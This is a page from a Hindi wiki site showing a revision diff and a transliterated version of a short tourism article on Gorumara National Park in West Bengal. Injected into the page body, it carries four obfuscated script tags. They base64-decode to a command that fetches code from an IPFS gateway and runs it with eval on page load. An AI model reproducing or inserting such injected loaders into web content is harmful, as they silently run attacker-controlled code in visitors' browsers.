Difference between revisions of "गोरूमाड़ा राष्ट्रीय उद्यान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
{{सूचना बक्सा पर्यटन
 
{{सूचना बक्सा पर्यटन
 
|चित्र=Gorumara-National-Park.jpg
 
|चित्र=Gorumara-National-Park.jpg
Line 11: Line 10:
 
|प्रबंधक=
 
|प्रबंधक=
 
|निर्माण काल=
 
|निर्माण काल=
|स्थापना=1949 में एक वन्यजीव अभयारण्य और 1992 राष्ट्रीय उद्यान घोषित किया गया
+
|स्थापना=1949 में एक वन्यजीव अभयारण्य और 1992 में राष्ट्रीय उद्यान घोषित किया गया
 
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=26.7,88.8&ll=26.784847,88.777771&spn=1.145005,1.766052&t=m&z=9 उत्तर- 26°42′; पूर्व- 88°48′]
 
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=26.7,88.8&ll=26.784847,88.777771&spn=1.145005,1.766052&t=m&z=9 उत्तर- 26°42′; पूर्व- 88°48′]
 
|मार्ग स्थिति=गोरूमाड़ा राष्ट्रीय उद्यान बागडोगरा हवाई अड्डा से लगभग 87 किमी की दूरी पर है।
 
|मार्ग स्थिति=गोरूमाड़ा राष्ट्रीय उद्यान बागडोगरा हवाई अड्डा से लगभग 87 किमी की दूरी पर है।
Line 23: Line 22:
 
|बस अड्डा=
 
|बस अड्डा=
 
|यातायात=टैक्सी, जीप और कार
 
|यातायात=टैक्सी, जीप और कार
|क्या देखें=प्राकृतिक सुन्दरता के मनमोहक दृश्य, खुले मैदान, घने जंगल और सुन्दर झरन
+
|क्या देखें=प्राकृतिक सुन्दरता के मनमोहक दृश्य, खुले मैदान, घने जंगल और सुन्दर झरने
 
|कहाँ ठहरें=
 
|कहाँ ठहरें=
 
|क्या खायें=
 
|क्या खायें=
Line 41: Line 40:
 
}}
 
}}
 
'''गोरूमाड़ा राष्ट्रीय उद्यान''' [[पश्चिम बंगाल]] राज्य के जलपाईगुडी से 52 किमी दूर मूर्ति और जलढ़ाका नदी के तट पर स्थित वन्यजीव अभयारण्य और राष्ट्रीय उद्यान है।
 
'''गोरूमाड़ा राष्ट्रीय उद्यान''' [[पश्चिम बंगाल]] राज्य के जलपाईगुडी से 52 किमी दूर मूर्ति और जलढ़ाका नदी के तट पर स्थित वन्यजीव अभयारण्य और राष्ट्रीय उद्यान है।
*गोरूमाड़ा राष्ट्रीय उद्यान को 1949 में एक वन्यजीव अभयारण्य और 1992 राष्ट्रीय उद्यान घोषित किया गया था।
+
*गोरूमाड़ा राष्ट्रीय उद्यान को 1949 में एक वन्यजीव अभयारण्य और 1992 में राष्ट्रीय उद्यान घोषित किया गया था।
 
*गोरूमाड़ा राष्ट्रीय उद्यान में पर्यटक प्राकृतिक सुन्दरता के मनमोहक दृश्य, खुले मैदान, घने जंगल और सुन्दर झरनों को देख सकते हैं।  
 
*गोरूमाड़ा राष्ट्रीय उद्यान में पर्यटक प्राकृतिक सुन्दरता के मनमोहक दृश्य, खुले मैदान, घने जंगल और सुन्दर झरनों को देख सकते हैं।  
 
*इन सबके अलावा गोरूमाड़ा राष्ट्रीय उद्यान में वन्य जीवों के ख़ूबसूरत दृश्य देखना भी पर्यटकों को बहुत पसंद आता है।  
 
*इन सबके अलावा गोरूमाड़ा राष्ट्रीय उद्यान में वन्य जीवों के ख़ूबसूरत दृश्य देखना भी पर्यटकों को बहुत पसंद आता है।  
Line 54: Line 53:
 
{{पश्चिम बंगाल के पर्यटन स्थल}}
 
{{पश्चिम बंगाल के पर्यटन स्थल}}
 
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
{{राष्ट्रीय उद्यान और अभयारण्य}}
[[Category:राष्ट्रीय उद्यान और अभयारण्य]]
+
[[Category:पर्यटन कोश]]
 
[[Category:पश्चिम बंगाल]]
 
[[Category:पश्चिम बंगाल]]
 
[[Category:पश्चिम बंगाल के पर्यटन स्थल]]
 
[[Category:पश्चिम बंगाल के पर्यटन स्थल]]
[[Category:पर्यटन कोश]]
+
[[Category:राष्ट्रीय उद्यान और अभयारण्य]]
  
 
__INDEX__
 
__INDEX__

Revision as of 06:21, 1 February 2012

gorooma da rashtriy udyan
vivaran gorooma da rashtriy udyan jalapaeegudi shahar se 52 kimi door moorti aur jaladhaka nadi ke tat par sthit vanyajiv abhayarany aur rashtriy udyan hai.
rajy pashchim bangal
zila jalapaeegudi
sthapana 1949 mean ek vanyajiv abhayarany aur 1992 mean rashtriy udyan ghoshit kiya gaya
bhaugolik sthiti uttar- 26°42′; poorv- 88°48′
marg sthiti gorooma da rashtriy udyan bagadogara havaee adda se lagabhag 87 kimi ki doori par hai.
prasiddhi gaianda, hathi, gau d, teandua gorooma da rashtriy udyan ke mukhy akarshan haian.
kaise pahuanchean havaee jahaz, rel, bas adi
havaee adda bagadogara havaee adda
relave steshan jalapaeegudi relave steshan
yatayat taiksi, jip aur kar
kya dekhean prakritik sundarata ke manamohak drishy, khule maidan, ghane jangal aur sundar jharane
chitr:Map-icon.gif googal manachitr

gorooma da rashtriy udyan pashchim bangal rajy ke jalapaeegudi se 52 kimi door moorti aur jaladhaka nadi ke tat par sthit vanyajiv abhayarany aur rashtriy udyan hai.

  • gorooma da rashtriy udyan ko 1949 mean ek vanyajiv abhayarany aur 1992 mean rashtriy udyan ghoshit kiya gaya tha.
  • gorooma da rashtriy udyan mean paryatak prakritik sundarata ke manamohak drishy, khule maidan, ghane jangal aur sundar jharanoan ko dekh sakate haian.
  • in sabake alava gorooma da rashtriy udyan mean vany jivoan ke khoobasoorat drishy dekhana bhi paryatakoan ko bahut pasand ata hai.
  • gaianda, hathi, gau d, teandua gorooma da rashtriy udyan ke mukhy akarshan haian.
  • gorooma da rashtriy udyan ki sair par ane vale paryatak inaki akarshak tasviroan ko apane kaimaroan mean kaid karake bhi le jate haian.

thumb|250px|left|gorooma da rashtriy udyan, jalapaeegudi

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>